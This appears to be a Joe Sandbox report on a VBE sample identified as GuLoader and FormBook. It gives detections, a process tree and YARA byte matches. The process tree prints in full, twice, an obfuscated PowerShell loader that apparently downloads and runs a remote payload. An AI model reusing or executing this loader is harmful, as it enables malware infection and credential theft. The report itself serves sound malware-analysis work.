Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Narudzba ACH0036173.vbe

Overview

General Information

Sample name:Narudzba ACH0036173.vbe
Analysis ID:1526385
MD5:824bafbe5495192cebc5804b329f3094
SHA1:2b0bdbb8bdd2b2a1c85f18830c52c221f83a2948
SHA256:dea03e99875a3cac75ed89dcc01f854f085ff13a9dfb406e25955e36668fde47
Tags:vbeuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6572 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2504 cmdline: cmd.exe /c ping 6777.6777.6777.677e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3864 cmdline: ping 6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
    • powershell.exe (PID: 1068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr Dknernr TeaktriBogsideGMercha i SnudesDMytedanNGruppereYoyoentSDisapprSReolplo).nravel ');Optllingslister (Spdbarnsplejerens '.ortuga[ lucan nsa irisETftestitMe lemr.Towns dSbreakb eSstvl rRCentralV,ndskriiIndophicBisae teS kkatipPap rweoSemidanISultestNOpfindetReprsenmOatearpaunepaulNEq iglaaInteraggNi.eaufeViablybRchar ae]Dichot.: Fea,an:tmrerlrS S anniEAlrune cFractiouProgramr MancheI Predebt Re oluydysphorpComelierDeflatioOppostiTKvgsakso P.eudoCKildeskoPladsbiLAar ang C elat=Ansgnin Uforbed[AndrikkNHygroskEParoemitAfdmpes.arbitrasEclegmeeCitatorC ropageuEmulsi RCh mistIBrickseT,elvklaYFaithfupEpinikiRS athelO dblsniTTeleslyoChestercunopposOAdoratol Heor ot RangewyFoolheaPbur houEAbseyhe]Linkedi: ,otiva:ReinvesTMicrospL GlyptoSFr stde1Rottegi2 Proje ');$Ekspatrieret=$Indistinctness[0];$husholdningsskoler=(Spdbarnsplejerens ' Gra.te$ PericaGJomfrubLHvelsenoGringssbCyklista Mis.ieL Affald: G dssau .ooteeNUd revnSMjavendh EtagelOFeltrkkuCentenilPleisefdUnluckiESerfsocRPackth.=SmaapennSporrenerigdo,mWbiopsie-,ukkerso Forhanb ForereJVrke miE HonnrrcLaborabtN nconv Hvlb,kesAflggery ForskaSFurfur,tDustragEVirussymGlucina.ChammieNDesigneeCae ardtRanker .LatticewRhi.enceTotalfobBagstrvcStai liLT.ltstaIAadredeEHiberninbun onutTweedja ');Optllingslister ($husholdningsskoler);Optllingslister (Spdbarnsplejerens 'Noncabi$ errariUSmrb omnPenitensaeoliavh Exter.oFourberuRational Diff.sd MishmeeTungsdyr Koordi.CrackjaHTileworeunitageaKlovbredInkpotse Yank erperceivs Jagtle[ udkaar$Newsm nRafgiv saVaarbe,iBrevposl BagtjecUnmodifaPes nterDriftstd Afsvid]Pi,dest=Tiercer$DementeSPreceptt ungetseUd.elhea Cor.hamSlipo tbSkydemooTeknoloaHypercat Te.nfei KotypenTippesggBeelb,w ');$uninverted=Spdbarnsplejerens 'Uansvar$ y.mygeURedescenCryptsbs Bo boihFjordmuoCult,rouIslamabl NeurocdBrotfore Opvi,lrIldfuld.galpedeDSnaskedoEmero swUundvrlnUlg,liglLapindeoDor micaMi,parsdtelomitF UnfiltiSkudfrilBenzog eCont ai( .rithl$IncarnaEAdffrozkNonre lsHeretripLefleroaendestat saltsgrAdgangsiSigjnereRedoingrudrangeeHarringtTo alfr,Unimp w$VragdelFLavtrykr.ubtruneKatteurm Svrm,ttHvidtlpo Uncoven Bre aaiHjpand n SkattegSubrepte ravebrrProconsnCatty he Blo.sosAb ulla)Dismali ';$Fremtoningernes=$Mekanismer;Optllingslister (Spdbarnsplejerens ' M ligg$DatolinGEsc rtaLRedugnyoDvrgtrebMosfeteaHydrophL Cresco:Unblockr AtlassEHaandvrCWoadwaxk aakesfu Mocamb=Talomr (RentegntRatevise H mmelsBar,uesTProphet-FormandP ForgemaGer niotFngselshKolofon Faneb a$MenagerFOutvo.erSalgsenEDia,reemEffektsTimitateo tomiseN Uduelii SupersNIr quoig PaaregeCharcutRLotu.blNKapelkue U viklsInappea)Craftsp ');while (!$Recku) {Optllingslister (Spdbarnsplejerens ' Forhaa$ nakewigPa eondlHaarskmo Lovfs,b D,lstraun ompolStor og:NeighboBBrnehavrFlygtnio EnogtylPh tohabRouma i=Tra sse$BoligkotChaouaurRedninguUnsysteeGranit ') ;Optllingslister $uninverted;Optllingslister (Spdbarnsplejerens 'c,ndemnsDerm,toTCutweedA PalterrRaketteTSlutbem-Boremusskl,ringl NoaordE Microme.okalplpO ybuty c,ment4Homosty ');Optllingslister (Spdbarnsplejerens 'Vegeter$ RemplaGNo jesolRaceadsoFinu.libLgebesgACebida lBou bak:OpregulR oorepoEPalaeotCKoteriokElevatoURioting=Stamper(UnsancttVit eoue s henesKa tepotJehov.c-Muddin.P Babirua sk vritAigretsHU locom Uncoher$SanenesFKrigshurTransmueMooningm PoikiltDolcinooLiljasgnB dkninI supranNGliblymgStrsteveCokingpr GynandNBetydeteBefstenSRinkens)Nationa ') ;Optllingslister (Spdbarnsplejerens 'Kla seb$Tir desGjrlislulGeniohyORiko.heBskjaldeaSiccarsLValgkam:O havsrP Pra esrQuinqueeU trustl SvejseUBetv.ngxIns uciuTightlirNonin eISem conoserbokru,inkendsCorabe.NN,teforesu afflstheriomsYndeful= Svejst$ hypogegJunetteLSolbrroO tsarkoBBestyreA Baldu.LJaspopa: KetchuFstromatL retsreJ Apolunl PrehalSMateriaBMixy kolhvepse dSprjteneGelidiaSUnctori+ umiste+,lteleg%Fo hand$Rejser IAfdkke,NAnchoriDS,licifI Fis,eps Tilke.tStudepriSmu stiNFadtc,ccTrocharTT anspinDeturreeInvariaSTiberbrsA terud.SupranaCUngdomyoDandyliUMglin.sNUnontolTUligevg ') ;$Ekspatrieret=$Indistinctness[$Preluxuriousness];}$Defensible=328477;$Cloyment112=33710;Optllingslister (Spdbarnsplejerens 'Forsmme$KriminagTahl anlKlippenOtedeumeB SnusetAfornuftl Shastr: Z motiROchersaEHempherN vandskTBronzese JubiluN Kodakse EkstraDskibsllSdionas tAnprisnTSprgepaEMyelapoL Sarde.SOculoc,eArmbroeNInt iga Dentif= Spilde Dygt gegPhthorfESkbnernTReallns-KursusmC Affe toAnskaffNAlienedtForkramEEchiurinOrganistGlanspa Festone$OuttravfMis nfoRProcam E TumbleMSkyggebtRisti.goReacha.NLaughi.iDivisilN rinserGBin ehiEGodkendRprovsteNPsywarsE Unsup SDena io ');Optllingslister (Spdbarnsplejerens ' Sphagn$Regle sgEyasesfl HeterooFarsalab ImportaGibbo.el By one:SluttisCLiltinghSknsv seGthedspmHensaasiForha nsDeafenetImma rirSmrgaasiMorgenbe Hilstesunfavor Sjufte= Repeti Kollabo[ DampruSFarvenhymiranhasFortrdetMalereee Stikpim Impreg. Sekte CSamfundoNonsympnKartot,vtomatrdePredaylrTarradit aimio] Mller.: enerva:KlevareFtro ddorOphthaloSpurioumAc puncBVaabensaTykmlkssSekund eStensto6Sluggar4FremstdS coit ot BobsldrUdstykni Waterwn,vrdfstgDiakoni(Afgang $TetrachRPostnumeChecksunjal.usitKlokkereTarriarnRegionaeOpmagasdSuccesssM,sfarvtCirkulrtEpimer eBlegekrlPrveb lsStrutteeRkvrkernOrganis) Oransa ');Optllingslister (Spdbarnsplejerens 'Leafenr$ SortergBenignal Hfe teoBal.onfBScentleA.drtspalDygtigt: Cura,iG CataraaMadcapsRnonexhiNDua iteimasseprsbe,adtaO AmilkanS mleobeCr.ftswr MarielErffelscsAfprvni A,sorp= orcer Napoleo[A lagteSBaga ebY s rongStotalitT S bsideCorrodamStreg a.Undg detHel,ogretambukixPrepareTAkkiles.Forbru eSkvis.nNMobilesc JenvipOBetrenddR.gmelsIFis.ureNSteriliGRe teno]Vandrep:Skadesl:Pa affiAWhizzerSDinoflac MusikliAbbreviiafgangs.ChestinGDiagnosE SeralbTDaggersS mult vt FrerbeRDegageri AfmattNDomstolgHa glin(Deflati$Trringec GuldfihStereo,eansvarsm SubtleIColonopS TrodsetSid temrlic enniEndivieEPaategnScolloqu)Mopishn ');Optllingslister (Spdbarnsplejerens 'Brugers$ZonelovgBe,bexkL B.achioR ssifybDutchamaP,etiskLGelati :Photoc FKrymmelOByggereRDitrochTgu denbi nailheDKinetog=Tilkald$ConsumeGMastereANewsletrBehandlN Skiferi Elekt s UnsmitOStrygejN ChaconeSe,vforROrganisebe,edneS ordski.VatnissS TranspuOpank iB enmandSbunkrettReben eRIndgnidIForskniN concouGTa dlge(Obsidia$PiouslyDEnc opaE robespf ProfesEUstori.nBystecrSNachitoiGennemfBFlommenLPolsterEC.seloa,D sfati$CenterlCTrykmaaL T kninOK.smiskYKdehandmSustente lsriv,N S uamutTilnavn1 Uov rt1clin me2Airtigh)gispede ');Optllingslister $fortid;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5812 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiofrVEmpireneMilieufr Dknernr TeaktriBogsideGMercha i SnudesDMytedanNGruppereYoyoentSDisapprSReolplo).nravel ');Optllingslister (Spdbarnsplejerens '.ortuga[ lucan nsa irisETftestitMe lemr.Towns dSbreakb eSstvl rRCentralV,ndskriiIndophicBisae teS kkatipPap rweoSemidanISultestNOpfindetReprsenmOatearpaunepaulNEq iglaaInteraggNi.eaufeViablybRchar ae]Dichot.: Fea,an:tmrerlrS S anniEAlrune cFractiouProgramr MancheI Predebt Re oluydysphorpComelierDeflatioOppostiTKvgsakso P.eudoCKildeskoPladsbiLAar ang C elat=Ansgnin Uforbed[AndrikkNHygroskEParoemitAfdmpes.arbitrasEclegmeeCitatorC ropageuEmulsi RCh mistIBrickseT,elvklaYFaithfupEpinikiRS athelO dblsniTTeleslyoChestercunopposOAdoratol Heor ot RangewyFoolheaPbur houEAbseyhe]Linkedi: ,otiva:ReinvesTMicrospL GlyptoSFr stde1Rottegi2 Proje ');$Ekspatrieret=$Indistinctness[0];$husholdningsskoler=(Spdbarnsplejerens ' Gra.te$ PericaGJomfrubLHvelsenoGringssbCyklista Mis.ieL Affald: G dssau .ooteeNUd revnSMjavendh EtagelOFeltrkkuCentenilPleisefdUnluckiESerfsocRPackth.=SmaapennSporrenerigdo,mWbiopsie-,ukkerso Forhanb ForereJVrke miE HonnrrcLaborabtN nconv Hvlb,kesAflggery ForskaSFurfur,tDustragEVirussymGlucina.ChammieNDesigneeCae ardtRanker .LatticewRhi.enceTotalfobBagstrvcStai liLT.ltstaIAadredeEHiberninbun onutTweedja ');Optllingslister ($husholdningsskoler);Optllingslister (Spdbarnsplejerens 'Noncabi$ errariUSmrb omnPenitensaeoliavh Exter.oFourberuRational Diff.sd MishmeeTungsdyr Koordi.CrackjaHTileworeunitageaKlovbredInkpotse Yank erperceivs Jagtle[ udkaar$Newsm nRafgiv saVaarbe,iBrevposl BagtjecUnmodifaPes nterDriftstd Afsvid]Pi,dest=Tiercer$DementeSPreceptt ungetseUd.elhea Cor.hamSlipo tbSkydemooTeknoloaHypercat Te.nfei KotypenTippesggBeelb,w ');$uninverted=Spdbarnsplejerens 'Uansvar$ y.mygeURedescenCryptsbs Bo boihFjordmuoCult,rouIslamabl NeurocdBrotfore Opvi,lrIldfuld.galpedeDSnaskedoEmero swUundvrlnUlg,liglLapindeoDor micaMi,parsdtelomitF UnfiltiSkudfrilBenzog eCont ai( .rithl$IncarnaEAdffrozkNonre lsHeretripLefleroaendestat saltsgrAdgangsiSigjnereRedoingrudrangeeHarringtTo alfr,Unimp w$VragdelFLavtrykr.ubtruneKatteurm Svrm,ttHvidtlpo Uncoven Bre aaiHjpand n SkattegSubrepte ravebrrProconsnCatty he Blo.sosAb ulla)Dismali ';$Fremtoningernes=$Mekanismer;Optllingslister (Spdbarnsplejerens ' M ligg$DatolinGEsc rtaLRedugnyoDvrgtrebMosfeteaHydrophL Cresco:Unblockr AtlassEHaandvrCWoadwaxk aakesfu Mocamb=Talomr (RentegntRatevise H mmelsBar,uesTProphet-FormandP ForgemaGer niotFngselshKolofon Faneb a$MenagerFOutvo.erSalgsenEDia,reemEffektsTimitateo tomiseN Uduelii SupersNIr quoig PaaregeCharcutRLotu.blNKapelkue U viklsInappea)Craftsp ');while (!$Recku) {Optllingslister (Spdbarnsplejerens ' Forhaa$ nakewigPa eondlHaarskmo Lovfs,b D,lstraun ompolStor og:NeighboBBrnehavrFlygtnio EnogtylPh tohabRouma i=Tra sse$BoligkotChaouaurRedninguUnsysteeGranit ') ;Optllingslister $uninverted;Optllingslister (Spdbarnsplejerens 'c,ndemnsDerm,toTCutweedA PalterrRaketteTSlutbem-Boremusskl,ringl NoaordE Microme.okalplpO ybuty c,ment4Homosty ');Optllingslister (Spdbarnsplejerens 'Vegeter$ RemplaGNo jesolRaceadsoFinu.libLgebesgACebida lBou bak:OpregulR oorepoEPalaeotCKoteriokElevatoURioting=Stamper(UnsancttVit eoue s henesKa tepotJehov.c-Muddin.P Babirua sk vritAigretsHU locom Uncoher$SanenesFKrigshurTransmueMooningm PoikiltDolcinooLiljasgnB dkninI supranNGliblymgStrsteveCokingpr GynandNBetydeteBefstenSRinkens)Nationa ') ;Optllingslister (Spdbarnsplejerens 'Kla seb$Tir desGjrlislulGeniohyORiko.heBskjaldeaSiccarsLValgkam:O havsrP Pra esrQuinqueeU trustl SvejseUBetv.ngxIns uciuTightlirNonin eISem conoserbokru,inkendsCorabe.NN,teforesu afflstheriomsYndeful= Svejst$ hypogegJunetteLSolbrroO tsarkoBBestyreA Baldu.LJaspopa: KetchuFstromatL retsreJ Apolunl PrehalSMateriaBMixy kolhvepse dSprjteneGelidiaSUnctori+ umiste+,lteleg%Fo hand$Rejser IAfdkke,NAnchoriDS,licifI Fis,eps Tilke.tStudepriSmu stiNFadtc,ccTrocharTT anspinDeturreeInvariaSTiberbrsA terud.SupranaCUngdomyoDandyliUMglin.sNUnontolTUligevg ') ;$Ekspatrieret=$Indistinctness[$Preluxuriousness];}$Defensible=328477;$Cloyment112=33710;Optllingslister (Spdbarnsplejerens 'Forsmme$KriminagTahl anlKlippenOtedeumeB SnusetAfornuftl Shastr: Z motiROchersaEHempherN vandskTBronzese JubiluN Kodakse EkstraDskibsllSdionas tAnprisnTSprgepaEMyelapoL Sarde.SOculoc,eArmbroeNInt iga Dentif= Spilde Dygt gegPhthorfESkbnernTReallns-KursusmC Affe toAnskaffNAlienedtForkramEEchiurinOrganistGlanspa Festone$OuttravfMis nfoRProcam E TumbleMSkyggebtRisti.goReacha.NLaughi.iDivisilN rinserGBin ehiEGodkendRprovsteNPsywarsE Unsup SDena io ');Optllingslister (Spdbarnsplejerens ' Sphagn$Regle sgEyasesfl HeterooFarsalab ImportaGibbo.el By one:SluttisCLiltinghSknsv seGthedspmHensaasiForha nsDeafenetImma rirSmrgaasiMorgenbe Hilstesunfavor Sjufte= Repeti Kollabo[ DampruSFarvenhymiranhasFortrdetMalereee Stikpim Impreg. Sekte CSamfundoNonsympnKartot,vtomatrdePredaylrTarradit aimio] Mller.: enerva:KlevareFtro ddorOphthaloSpurioumAc puncBVaabensaTykmlkssSekund eStensto6Sluggar4FremstdS coit ot BobsldrUdstykni Waterwn,vrdfstgDiakoni(Afgang $TetrachRPostnumeChecksunjal.usitKlokkereTarriarnRegionaeOpmagasdSuccesssM,sfarvtCirkulrtEpimer eBlegekrlPrveb lsStrutteeRkvrkernOrganis) Oransa ');Optllingslister (Spdbarnsplejerens 'Leafenr$ SortergBenignal Hfe teoBal.onfBScentleA.drtspalDygtigt: Cura,iG CataraaMadcapsRnonexhiNDua iteimasseprsbe,adtaO AmilkanS mleobeCr.ftswr MarielErffelscsAfprvni A,sorp= orcer Napoleo[A lagteSBaga ebY s rongStotalitT S bsideCorrodamStreg a.Undg detHel,ogretambukixPrepareTAkkiles.Forbru eSkvis.nNMobilesc JenvipOBetrenddR.gmelsIFis.ureNSteriliGRe teno]Vandrep:Skadesl:Pa affiAWhizzerSDinoflac MusikliAbbreviiafgangs.ChestinGDiagnosE SeralbTDaggersS mult vt FrerbeRDegageri AfmattNDomstolgHa glin(Deflati$Trringec GuldfihStereo,eansvarsm SubtleIColonopS TrodsetSid temrlic enniEndivieEPaategnScolloqu)Mopishn ');Optllingslister (Spdbarnsplejerens 'Brugers$ZonelovgBe,bexkL B.achioR ssifybDutchamaP,etiskLGelati :Photoc FKrymmelOByggereRDitrochTgu denbi nailheDKinetog=Tilkald$ConsumeGMastereANewsletrBehandlN Skiferi Elekt s UnsmitOStrygejN ChaconeSe,vforROrganisebe,edneS ordski.VatnissS TranspuOpank iB enmandSbunkrettReben eRIndgnidIForskniN concouGTa dlge(Obsidia$PiouslyDEnc opaE robespf ProfesEUstori.nBystecrSNachitoiGennemfBFlommenLPolsterEC.seloa,D sfati$CenterlCTrykmaaL T kninOK.smiskYKdehandmSustente lsriv,N S uamutTilnavn1 Uov rt1clin me2Airtigh)gispede ');Optllingslister $fortid;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1852 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • HTiDHBMqChwMbO.exe (PID: 1436 cmdline: "C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msinfo32.exe (PID: 2380 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5C49B7B55D4AF40DB1047E08484D6656)
          • HTiDHBMqChwMbO.exe (PID: 1696 cmdline: "C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6892 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bb10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.2955140831.00000000034C0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bb10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
